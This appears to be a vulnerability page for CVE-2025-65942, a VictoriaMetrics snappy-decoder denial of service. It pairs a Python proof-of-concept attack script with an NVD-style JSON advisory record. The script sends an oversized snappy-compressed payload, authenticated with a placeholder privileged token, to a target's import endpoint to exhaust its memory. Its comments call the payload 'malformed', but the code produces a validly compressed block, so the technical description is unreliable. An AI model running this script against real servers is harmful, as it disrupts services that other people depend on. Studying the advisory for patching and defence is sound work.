CVE-2025-65942

# PoC for CVE-2025-65942 - VictoriaMetrics Snappy DoS # Note: This is a conceptual PoC demonstrating the attack vector # Requires high-privilege access to VictoriaMetrics import requests import snappy import sys TARGET_URL = "http://target:8428/api/v1/import" MAX_REQUEST_LIMIT = 32 * 1024 * 1024 # 32MB example limit def create_malformed_snappy_block(): """ Create a malformed snappy block that exceeds size limits This triggers excessive memory allocation during decompression """ # Create data larger than MaxRequestLimit oversized_data = b'X' * (MAX_REQUEST_LIMIT * 10) # Compress with snappy - creates a block that will cause # decoder to allocate excessive memory when decompressed compressed = snappy.compress(oversized_data) return compressed def exploit_cve_2025_65942(target_url): """ Send malformed snappy block to trigger DoS """ payload = create_malformed_snappy_block() headers = { 'Content-Type': 'application/x-snappy', 'Authorization': 'Bearer <high-privilege-token>' } print(f"[*] Sending malformed snappy block to {target_url}") print(f"[*] Compressed size: {len(payload)} bytes") print(f"[*] Decompressed size would exceed: {MAX_REQUEST_LIMIT * 10} bytes") try: response = requests.post(target_url, data=payload, headers=headers, timeout=30) print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed (possibly OOM): {e}") if __name__ == "__main__": if len(sys.argv) > 1: exploit_cve_2025_65942(sys.argv[1]) else: exploit_cve_2025_65942(TARGET_URL)

{"cve": {"id": "CVE-2025-65942", "sourceIdentifier": "[email protected]", "published": "2025-11-25T23:15:47.923", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VictoriaMetrics is a scalable solution for monitoring and managing time series data. In versions from 1.0.0 to before 1.110.23, from 1.111.0 to before 1.122.8, and from 1.123.0 to before 1.129.1, affected versions are vulnerable to DoS attacks because the snappy decoder ignored VictoriaMetrics request size limits allowing malformed blocks to trigger excessive memory use. This could lead to OOM errors and service instability. The fix enforces block-size checks based on MaxRequest limits. This issue has been patched in versions 1.110.23, 1.122.8, and 1.129.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://github.com/VictoriaMetrics/VictoriaMetrics/commit/51b44afd34d2c9a392d4ebedeeb5b4a7f5beca24", "source": "[email protected]"}, {"url": "https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.110.23", "source": "[email protected]"}, {"url": "https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.122.8", "source": "[email protected]"}, {"url": "https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.129.1", "source": "[email protected]"}, {"url": "https://github.com/VictoriaMetrics/VictoriaMetrics/security/advisories/GHSA-66jq-2c23-2xh5", "source": "[email protected]"}]}}